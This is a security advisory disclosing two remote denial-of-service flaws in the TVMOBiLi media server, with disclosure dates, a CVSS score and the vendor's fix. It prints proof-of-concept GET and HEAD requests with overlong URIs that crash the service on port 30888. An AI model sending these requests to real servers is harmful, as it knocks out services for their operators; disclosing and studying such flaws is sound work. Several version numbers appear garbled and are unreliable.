283 software vendors have fixed 921 vulnerabilities in their products thanks to High-Tech Bridge Security Research Lab.
Patch Available Upon Disclosure
|2013 Q4: 67%||2013 Q1: 100%|
|2013 Q3: 77%||2012 Q4: 68%|
|2013 Q2: 92%||2012 Q3: 69%|
Vendor Average Time to Patch
|2013 Q4: 8 days||2013 Q1: 13 days|
|2013 Q3: 13 days||2012 Q4: 26 days|
|2013 Q2: 30 days||2012 Q3: 22 days|
TVMOBiLi Media Server Multiple Remote DoS Vulnerabilities
|Product:||TVMOBiLi media server|
|Vulnerable Versions:||184.108.40.20657 and probably prior version|
|Tested Version:||220.127.116.1157 in Windows XP SP3 32 bits|
|Advisory Publication:||October 15, 2012 [without technical details]|
|Vendor Notification:||October 15, 2012|
|Vendor Fix:||November 21, 2012|
|Public Disclosure:||December 5, 2012|
|Latest Update:||November 27, 2012|
|Vulnerability Type:||Improper Handling of Length Parameter Inconsistency [CWE-130]|
|CVSSv2 Base Score:||5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)|
|Solution Status:||Fixed by Vendor|
|Discovered and Provided:||High-Tech Bridge Security Research Lab|
High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.
1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451
1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.
MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000 disasm around:
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Crash details CONTEXT DUMP disasm around:
HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
|Upgrade to TVMOBiLi 18.104.22.16874|
| High-Tech Bridge Advisory HTB23120 - https://www.htbridge.com/advisory/HTB23120 - TvMobili Media Server Multiple Remote DoS Vulnerabilities.|
 TVMOBiLi LTD - http://www.tvmobili.com - TVMOBiLi is a free Media server for Mac, Windows, and Linux Operating Systems.
 Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
 Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.